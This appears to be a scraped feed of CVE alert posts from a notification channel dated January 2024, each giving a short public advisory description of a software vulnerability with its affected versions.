🚨 CVE-2023-46324pkg/suci/suci.go in free5GC udm before 1.2.0, when Go before 1.19 is used, allows an Invalid Curve Attack because it may compute a shared secret via an uncompressed public key that has not been validated. An attacker can send arbitrary SUCIs to the UDM, which tries to decrypt them via both its private key and the attacker's public key.🎖@cveNotify |
|
| 2024-01-09 14:07:32 |
🚨 CVE-2023-52204Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Javik Randomize.This issue affects Randomize: from n/a through 1.4.3.🎖@cveNotify |
|
| 2024-01-09 14:07:26 |
🚨 CVE-2023-52203Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Oliver Seidel, Bastian Germann cformsII allows Stored XSS.This issue affects cformsII: from n/a through 15.0.5.🎖@cveNotify |
|
| 2024-01-09 14:07:25 |
🚨 CVE-2023-47890pyLoad 0.5.0 is vulnerable to Unrestricted File Upload.🎖@cveNotify |
|
| 2024-01-09 13:37:24 |
🚨 CVE-2020-26625A SQL injection vulnerability was discovered in Gila CMS 1.15.4 and earlier which allows a remote attacker to execute arbitrary web scripts via the 'user_id' parameter after the login portal.🎖@cveNotify |
|
| 2024-01-09 09:37:32 |
🚨 CVE-2023-6148Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access and access to configure or edit jobs to utilize the plugin to configure a potential rouge endpoint via which it was possible to control response for certain request which could be injected with XSS payloads leading to XSS while processing the response data🎖@cveNotify |
|
| 2024-01-09 09:37:26 |
🚨 CVE-2023-50974In Appwrite CLI before 3.0.0, when using the login command, the credentials of the Appwrite user are stored in a ~/.appwrite/prefs.json file with 0644 as UNIX permissions. Any user of the local system can access those credentials.🎖@cveNotify |
|
| 2024-01-09 09:37:25 |
🚨 CVE-2023-49236A stack-based buffer overflow was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices, leading to arbitrary command execution. This occurs because of lack of length validation during an sscanf of a user-entered scale field in the RTSP playback function of davinci.🎖@cveNotify |
|
| 2024-01-09 09:37:24 |
🚨 CVE-2023-49235An issue was discovered in libremote_dbg.so on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Filtering of debug information is mishandled during use of popen. Consequently, an attacker can bypass validation and execute a shell command.🎖@cveNotify |
|
| 2024-01-09 08:37:25 |
🚨 CVE-2023-7220A vulnerability was found in Totolink NR1800X 9.1.0u.6279_B20210910 and classified as critical. Affected by this issue is the function loginAuth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument password leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-09 08:37:24 |
🚨 CVE-2023-6147Qualys Jenkins Plugin for Policy Compliance prior to version and including 1.0.5 was identified to be affected by a security flaw, which was missing a permission check while performing a connectivity check to Qualys Cloud Services. This allowed any user with login access to configure or edit jobs to utilize the plugin and configure potential a rouge endpoint via which it was possible to control response for certain request which could be injected with XXE payloads leading to XXE while processing the response data🎖@cveNotify |
|
| 2024-01-09 06:37:25 |
🚨 CVE-2020-24706An issue was discovered in certain WSO2 products. The Try It tool allows Reflected XSS. This affects API Manager through 3.1.0, API Manager Analytics 2.5.0, IS as Key Manager through 5.10.0, Identity Server through 5.10.0, Identity Server Analytics through 5.6.0, and IoT Server 3.1.0.🎖@cveNotify |
|
| 2024-01-09 06:37:24 |
🚨 CVE-2020-24705An issue was discovered in certain WSO2 products. A valid Carbon Management Console session cookie may be sent to an attacker-controlled server if the victim submits a crafted Try It request, aka Session Hijacking. This affects API Manager through 3.1.0, API Manager Analytics 2.5.0, IS as Key Manager through 5.10.0, Identity Server through 5.10.0, Identity Server Analytics through 5.6.0, and IoT Server 3.1.0.🎖@cveNotify |
|
| 2024-01-09 04:37:24 |
🚨 CVE-2023-6788The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.1. This is due to missing or incorrect nonce validation on the contents function. This makes it possible for unauthenticated attackers to update the options "mf_hubsopt_token", "mf_hubsopt_refresh_token", "mf_hubsopt_token_type", and "mf_hubsopt_expires_in" via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This would allow an attacker to connect their own Hubspot account to a victim site's metform to obtain leads and contacts.🎖@cveNotify |
|
| 2024-01-09 03:37:32 |
🚨 CVE-2022-30947Jenkins Git Plugin 4.11.1 and earlier allows attackers able to configure pipelines to check out some SCM repositories stored on the Jenkins controller's file system using local paths as SCM URLs, obtaining limited information about other projects' SCM contents.🎖@cveNotify |
|
| 2024-01-09 03:37:25 |
🚨 CVE-2004-0458mah-jong before 1.6.2 allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference.🎖@cveNotify |
|
| 2024-01-09 03:37:24 |
🚨 CVE-2003-1000xchat 2.0.6 allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference.🎖@cveNotify |
|
| 2024-01-09 03:07:32 |
🚨 CVE-2023-0558The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to an unsecure token check that is susceptible to type juggling in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to execute functions intended for use by users with proper API keys.🎖@cveNotify |
|
| 2024-01-09 03:07:26 |
🚨 CVE-2023-24070app/View/AuthKeys/authkey_display.ctp in MISP through 2.4.167 has an XSS in authkey add via a Referer field.🎖@cveNotify |
|
| 2024-01-09 03:07:25 |
🚨 CVE-2008-0386Xdg-utils 1.0.2 and earlier allows user-assisted remote attackers to execute arbitrary commands via shell metacharacters in a URL argument to (1) xdg-open or (2) xdg-email.🎖@cveNotify |
|
| 2024-01-09 03:07:24 |
🚨 CVE-2008-0008The pa_drop_root function in PulseAudio 0.9.8, and a certain 0.9.9 build, does not check return values from (1) setresuid, (2) setreuid, (3) setuid, and (4) seteuid calls when attempting to drop privileges, which might allow local users to gain privileges by causing those calls to fail via attacks such as resource exhaustion.🎖@cveNotify |
|
| 2024-01-09 02:37:25 |
🚨 CVE-2015-8103The Jenkins CLI subsystem in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to execute arbitrary code via a crafted serialized Java object, related to a problematic webapps/ROOT/WEB-INF/lib/commons-collections-*.jar file and the "Groovy variant in 'ysoserial'".🎖@cveNotify |
|
| 2024-01-09 02:37:24 |
🚨 CVE-2013-1465The Cubecart::_basket method in classes/cubecart.class.php in CubeCart 5.0.0 through 5.2.0 allows remote attackers to unserialize arbitrary PHP objects via a crafted shipping parameter, as demonstrated by modifying the application configuration using the Config object.🎖@cveNotify |
|
| 2024-01-09 02:07:32 |
🚨 CVE-2023-41990The issue was addressed with improved handling of caches. This issue is fixed in tvOS 16.3, iOS 16.3 and iPadOS 16.3, macOS Monterey 12.6.8, macOS Big Sur 11.7.9, iOS 15.7.8 and iPadOS 15.7.8, macOS Ventura 13.2, watchOS 9.3. Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2024-01-09 02:07:25 |
🚨 CVE-2023-23752An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.🎖@cveNotify |
|
| 2024-01-09 02:07:24 |
🚨 CVE-2016-20017D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022.🎖@cveNotify |
|
| 2024-01-09 01:37:24 |
🚨 CVE-2023-28471Concrete CMS (previously concrete5) in versions 9.0 through 9.1.3 is vulnerable to Stored XSS via a container name.🎖@cveNotify |
|
| 2024-01-09 00:37:32 |
🚨 CVE-2024-21663Discord-Recon is a Discord bot created to automate bug bounty recon, automated scans and information gathering via a discord server. Discord-Recon is vulnerable to remote code execution. An attacker is able to execute shell commands in the server without having an admin role. This vulnerability has been fixed in version 0.0.8.🎖@cveNotify |
|
| 2024-01-09 00:37:25 |
🚨 CVE-2023-28476Concrete CMS (previously concrete5) in versions 9.0 through 9.1.3 is vulnerable to Stored XSS on Tags on uploaded files.🎖@cveNotify |
|
| 2024-01-09 00:37:24 |
🚨 CVE-2023-28474Concrete CMS (previously concrete5) in versions 9.0 through 9.1.3 is vulnerable to Stored XSS on Saved Presets on search.🎖@cveNotify |
|
| 2024-01-08 23:37:32 |
🚨 CVE-2023-41710User-defined script code could be stored for a upsell related shop URL. This code was not correctly sanitized when adding it to DOM. Attackers could lure victims to user accounts with malicious script code and make them execute it in the context of a trusted domain. We added sanitization for this content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-08 23:37:25 |
🚨 CVE-2023-29049The "upsell" widget at the portal page could be abused to inject arbitrary script code. Attackers that manage to lure users to a compromised account, or gain temporary access to a legitimate account, could inject script code to gain persistent code execution capabilities under a trusted domain. User input for this widget is now sanitized to avoid malicious content the be processed. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-08 23:37:24 |
🚨 CVE-2023-29048A component for parsing OXMF templates could be abused to execute arbitrary system commands that would be executed as the non-privileged runtime user. Users and attackers could run system commands with limited privilege to gain unauthorized access to confidential information and potentially violate integrity by modifying resources. The template engine has been reconfigured to deny execution of harmful commands on a system level. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-08 21:37:32 |
🚨 CVE-2023-51408Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StudioWombat WP Optin Wheel – Gamified Optin Email Marketing Tool for WordPress and WooCommerce.This issue affects WP Optin Wheel – Gamified Optin Email Marketing Tool for WordPress and WooCommerce: from n/a through 1.4.3.🎖@cveNotify |
|
| 2024-01-08 21:37:25 |
🚨 CVE-2022-45354Exposure of Sensitive Information to an Unauthorized Actor vulnerability in WPChill Download Monitor.This issue affects Download Monitor: from n/a through 4.7.60.🎖@cveNotify |
|
| 2024-01-08 21:37:24 |
🚨 CVE-2023-47489An issue in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components.🎖@cveNotify |
|
| 2024-01-08 20:37:32 |
🚨 CVE-2023-52200Cross-Site Request Forgery (CSRF), Deserialization of Untrusted Data vulnerability in Repute Infosystems ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup.This issue affects ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup: n/a.🎖@cveNotify |
|
| 2024-01-08 20:37:25 |
🚨 CVE-2023-6631PowerSYSTEM Center versions 2020 Update 16 and prior contain a vulnerability that may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.🎖@cveNotify |
|
| 2024-01-08 20:37:24 |
🚨 CVE-2023-47488Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.🎖@cveNotify |
|
| 2024-01-08 20:07:32 |
🚨 CVE-2024-21911TinyMCE versions before 5.6.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user's browser.🎖@cveNotify |
|
| 2024-01-08 20:07:25 |
🚨 CVE-2023-49794KernelSU is a Kernel-based root solution for Android devices. In versions 0.7.1 and prior, the logic of get apk path in KernelSU kernel module can be bypassed, which causes any malicious apk named `me.weishu.kernelsu` get root permission. If a KernelSU module installed device try to install any not checked apk which package name equal to the official KernelSU Manager, it can take over root privileges on the device. As of time of publication, a patched version is not available.🎖@cveNotify |
|
| 2024-01-08 20:07:24 |
🚨 CVE-2023-6436Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ekol Informatics Website Template allows SQL Injection.This issue affects Website Template: through 20231215.🎖@cveNotify |
|
| 2024-01-08 19:37:32 |
🚨 CVE-2023-6421The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.🎖@cveNotify |
|
| 2024-01-08 19:37:26 |
🚨 CVE-2023-6093A clickjacking vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. This vulnerability is caused by incorrectly restricts frame objects, which can lead to user confusion about which interface the user is interacting with. This vulnerability may lead the attacker to trick the user into interacting with the application.🎖@cveNotify |
|
| 2024-01-08 19:37:25 |
🚨 CVE-2023-47804Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose.Links can be activated by clicks, or by automatic document events.The execution of such links must be subject to user approval.In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.This is a corner case of CVE-2022-47502.🎖@cveNotify |
|
| 2024-01-08 19:37:24 |
🚨 CVE-2023-51675URL Redirection to Untrusted Site ('Open Redirect') vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More.This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.18.🎖@cveNotify |
|
| 2024-01-08 19:07:43 |
🚨 CVE-2023-43514Memory corruption while invoking IOCTLs calls from user space for internal mem MAP and internal mem UNMAP.🎖@cveNotify |
|
| 2024-01-08 19:07:37 |
🚨 CVE-2023-43512Transient DOS while parsing GATT service data when the total amount of memory that is required by the multiple services is greater than the actual size of the services buffer.🎖@cveNotify |
|
| 2024-01-08 19:07:36 |
🚨 CVE-2023-33117Memory corruption when HLOS allocates the response payload buffer to copy the data received from ADSP in response to AVCS_LOAD_MODULE command.🎖@cveNotify |
|
| 2024-01-08 19:07:35 |
🚨 CVE-2023-33116Transient DOS while parsing ieee80211_parse_mscs_ie in WIN WLAN driver.🎖@cveNotify |
|
| 2024-01-08 19:07:31 |
🚨 CVE-2023-33108Memory corruption in Graphics Driver when destroying a context with KGSL_GPU_AUX_COMMAND_TIMELINE objects queued.🎖@cveNotify |
|
| 2024-01-08 19:07:30 |
🚨 CVE-2023-33025Memory corruption in Data Modem when a non-standard SDP body, during a VOLTE call.🎖@cveNotify |
|
| 2024-01-08 19:07:26 |
🚨 CVE-2024-21732FlyCms through abbaa5a allows XSS via the permission management feature.🎖@cveNotify |
|
| 2024-01-08 19:07:25 |
🚨 CVE-2023-4541Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ween Software Admin Panel allows SQL Injection.This issue affects Admin Panel: through 20231229. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 18:37:32 |
🚨 CVE-2024-0273A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as critical. Affected is an unknown function of the file addwaste_entry.php. The manipulation of the argument item_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249828.🎖@cveNotify |
|
| 2024-01-08 18:37:26 |
🚨 CVE-2024-0272A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. This issue affects some unknown processing of the file addmaterialsubmit.php. The manipulation of the argument material_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249827.🎖@cveNotify |
|
| 2024-01-08 18:37:25 |
🚨 CVE-2024-0183A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 18:07:32 |
🚨 CVE-2024-0281A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836.🎖@cveNotify |
|
| 2024-01-08 18:07:25 |
🚨 CVE-2023-50708yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-01-08 18:07:24 |
🚨 CVE-2023-45862An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation.🎖@cveNotify |
|
| 2024-01-08 17:37:32 |
🚨 CVE-2023-6271The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups.🎖@cveNotify |
|
| 2024-01-08 17:37:25 |
🚨 CVE-2023-4674Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yaztek Software Technologies and Computer Systems E-Commerce Software allows SQL Injection.This issue affects E-Commerce Software: through 20231229. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-08 17:37:24 |
🚨 CVE-2023-51475Unrestricted Upload of File with Dangerous Type vulnerability in IOSS WP MLM SOFTWARE PLUGIN.This issue affects WP MLM SOFTWARE PLUGIN: from n/a through 4.0.🎖@cveNotify |
|
| 2024-01-08 16:37:33 |
🚨 CVE-2023-35128An integer overflow vulnerability exists in the fstReaderIterBlocks2 time_table tsec_nitems functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to memory corruption. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-08 16:37:26 |
🚨 CVE-2023-34436An out-of-bounds write vulnerability exists in the LXT2 num_time_table_entries functionality of GTKWave 3.3.115. A specially crafted .lxt2 file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-08 16:37:25 |
🚨 CVE-2023-51443FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.🎖@cveNotify |
|
| 2024-01-08 16:37:24 |
🚨 CVE-2023-6560An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system.🎖@cveNotify |
|
| 2024-01-08 15:37:38 |
🚨 CVE-2024-21645pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. This vulnerability has been patched in version 0.5.0b3.dev77.🎖@cveNotify |
|
| 2024-01-08 15:37:31 |
🚨 CVE-2023-51701fastify-reply-from is a Fastify plugin to forward the current HTTP request to another server. A reverse proxy server built with `@fastify/reply-from` could misinterpret the incoming body by passing an header `ContentType: application/json ; charset=utf-8`. This can lead to bypass of security checks. This vulnerability has been patched in '@fastify/reply-from` version 9.6.0.🎖@cveNotify |
|
| 2024-01-08 15:37:30 |
🚨 CVE-2024-0321Stack-based Buffer Overflow in GitHub repository gpac/gpac prior to 2.3-DEV.🎖@cveNotify |
|
| 2024-01-08 15:37:26 |
🚨 CVE-2023-6921Blind SQL Injection vulnerability in PrestaShow Google Integrator (PrestaShop addon) allows for data extraction and modification. This attack is possible via command insertion in one of the cookies.🎖@cveNotify |
|
| 2024-01-08 15:37:25 |
🚨 CVE-2023-50714yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available.🎖@cveNotify |
|
| 2024-01-08 15:07:31 |
🚨 CVE-2023-6037The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-01-08 15:07:30 |
🚨 CVE-2023-50578Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do.🎖@cveNotify |
|
| 2024-01-08 15:07:26 |
🚨 CVE-2023-7175A vulnerability was found in Campcodes Online College Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/borrow_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249362 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 15:07:25 |
🚨 CVE-2023-51079A TimeOut error exists in the ParseTools.subCompileExpression method in mvel2 v2.5.0 Final.🎖@cveNotify |
|
| 2024-01-08 14:37:32 |
🚨 CVE-2024-21644pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.🎖@cveNotify |
|
| 2024-01-08 14:37:26 |
🚨 CVE-2023-7224OpenVPN Connect version 3.0 through 3.4.6 on macOS allows local users to execute code in external third party libraries using the DYLD_INSERT_LIBRARIES environment variable🎖@cveNotify |
|
| 2024-01-08 14:37:25 |
🚨 CVE-2023-52240The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.)🎖@cveNotify |
|
| 2024-01-08 14:37:24 |
🚨 CVE-2023-6710A flaw was found in the mod_proxy_cluster in the Apache server. This issue may allow a malicious user to add a script in the 'alias' parameter in the URL to trigger the stored cross-site scripting (XSS) vulnerability. By adding a script on the alias parameter on the URL, it adds a new virtual host and adds the script to the cluster-manager page.🎖@cveNotify |
|
| 2024-01-08 14:07:33 |
🚨 CVE-2023-7173A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 14:07:32 |
🚨 CVE-2023-7172A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356.🎖@cveNotify |
|
| 2024-01-08 13:37:25 |
🚨 CVE-2024-0322Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3-DEV.🎖@cveNotify |
|
| 2024-01-08 13:37:24 |
🚨 CVE-2023-6552Lack of "current" GET parameter validation during the action of changing a language leads to an open redirect vulnerability.🎖@cveNotify |
|
| 2024-01-08 13:07:32 |
🚨 CVE-2023-31300An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via transmission of unencrypted, cleartext credentials during Password Reset feature.🎖@cveNotify |
|
| 2024-01-08 13:07:26 |
🚨 CVE-2023-31295CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the User Profile field.🎖@cveNotify |
|
| 2024-01-08 13:07:25 |
🚨 CVE-2023-31293An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to obtain sensitive information and bypass profile restriction via improper access control in the Reader system user's web browser, allowing the journal to be displayed, despite the option being disabled.🎖@cveNotify |
|
| 2024-01-08 13:07:24 |
🚨 CVE-2023-50730Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn't checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an applications GraphQL schema would be required to construct such a query, however no knowledge of any application-specific performance or other behavioural characteristics would be needed.Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an applications GraphQL schema would be required to construct such a query.The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing.🎖@cveNotify |
|
| 2024-01-08 12:37:26 |
🚨 CVE-2023-6921Blind SQL Injection vulnerability in PrestaShow Google Integrator (PrestaShop addon) allows for data extraction and modification. This attack is possible via command insertion in one of the cookies.🎖@cveNotify |
|
| 2024-01-08 12:07:32 |
🚨 CVE-2023-50121Autel EVO NANO drone flight control firmware version 1.6.5 is vulnerable to denial of service (DoS).🎖@cveNotify |
|
| 2024-01-08 12:07:26 |
🚨 CVE-2023-46953SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module.🎖@cveNotify |
|
| 2024-01-08 12:07:25 |
🚨 CVE-2023-50612Insecure Permissions vulnerability in fit2cloud Cloud Explorer Lite version 1.4.1, allow local attackers to escalate privileges and obtain sensitive information via the cloud accounts parameter.🎖@cveNotify |
|
| 2024-01-08 12:07:24 |
🚨 CVE-2024-21642D-Tale is a visualizer for Pandas data structures. Users hosting versions D-Tale prior to 3.9.0 publicly can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to only host D-Tale to trusted users.🎖@cveNotify |
|
| 2024-01-08 10:37:25 |
🚨 CVE-2024-0307A vulnerability was found in Kashipara Dynamic Lab Management System up to 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login_process.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249874 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 10:37:24 |
🚨 CVE-2023-5091Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver allows a local non-privileged user to make improper GPU processing operations to gain access to already freed memory. This issue affects Valhall GPU Kernel Driver: from r37p0 through r40p0.🎖@cveNotify |
|
| 2024-01-08 09:37:32 |
🚨 CVE-2023-29052Users were able to define disclaimer texts for an upsell shop dialog that would contain script code that was not sanitized correctly. Attackers could lure victims to user accounts with malicious script code and make them execute it in the context of a trusted domain. We added sanitization for this content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-08 09:37:25 |
🚨 CVE-2023-29048A component for parsing OXMF templates could be abused to execute arbitrary system commands that would be executed as the non-privileged runtime user. Users and attackers could run system commands with limited privilege to gain unauthorized access to confidential information and potentially violate integrity by modifying resources. The template engine has been reconfigured to deny execution of harmful commands on a system level. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-08 09:37:24 |
🚨 CVE-2023-5824Squid is vulnerable to Denial of Service attack against HTTP and HTTPS clients due to an Improper Handling of Structural Elements bug.🎖@cveNotify |
|
| 2024-01-08 08:37:26 |
🚨 CVE-2024-0303A vulnerability, which was classified as critical, was found in Youke365 up to 1.5.3. Affected is an unknown function of the file /app/api/controller/caiji.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249870 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 07:37:25 |
🚨 CVE-2024-0302A vulnerability, which was classified as critical, has been found in fhs-opensource iparking 1.5.22.RELEASE. This issue affects some unknown processing of the file /vueLogin. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249869 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-08 07:37:24 |
